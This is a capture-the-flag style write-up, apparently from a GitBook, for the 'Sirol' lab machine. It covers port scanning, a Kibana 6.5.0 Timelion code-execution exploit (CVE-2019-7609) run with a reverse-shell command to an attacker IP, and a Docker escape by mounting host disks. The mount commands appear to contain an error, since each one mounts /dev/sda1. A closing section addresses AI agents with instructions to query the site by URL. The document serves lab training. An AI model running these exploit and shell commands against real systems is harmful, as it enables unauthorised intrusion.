# Sirol

## Information Gathering

`rustscan -a 192.168.241.54 --ulimit 5000`

![](/files/EaOdMwwg96XdqKjF6zm2)

`nmap -sC -sV --reason -p22,80,3306,5601,24007 192.168.241.54`

![](/files/r8seFlUrfBp7RapmCcLF)

### Service Enumeration

### Kibana (Port 5601)

![](/files/rtfJxezOtBpuTFKGVopB)

Under the Management tab, we can find the version number of Kibana that is running.

![](/files/QFggApnvBurp5QTrPmVT)

## Exploit

Kibana Version 6.5.0 contains an arbitrary code execution flaw in the Timelion visualizer.

{% embed url="<https://github.com/LandGrey/CVE-2019-7609>" %}

Payload: `python CVE-2019-7609-kibana-rce.py -u http://192.168.241.54:5601/ -host 192.168.49.241 -port 12345 --shell`

![](/files/MgljZDGQUKuTxUQ3r6Rx)

![](/files/wzbZi4F7Oy55jS4JwmWL)

## Privesc

While we are already the root user, the root directory doesn't seem to have what we are looking for.

![](/files/skO4alUu5a1s8LydbHAJ)

Notice that when we list the contents in the root directory, there is a `.dockerenv file`. This along with the fact that our hostname is a bunch of alphanumeric characters would likely indicate that we are in a docker container.

Using the command `fdisk -l` we can see what other disks are there.

We can then create a directory and mount all other disks.

![](/files/UtnqPTpQL7E7vfjpgLUa)

```
mkdir /mnt/sda1
mkdir /mnt/sda2
mkdir /mnt/sda5

mount /dev/sda1 /mnt/sda1
mount /dev/sda1 /mnt/sda2
mount /dev/sda1 /mnt/sda5
```

![](/files/SO6QQx3X2ZGe3qeISo1F)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infintesky.gitbook.io/pentesting/proving-grounds/try-harder/linux/sirol.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.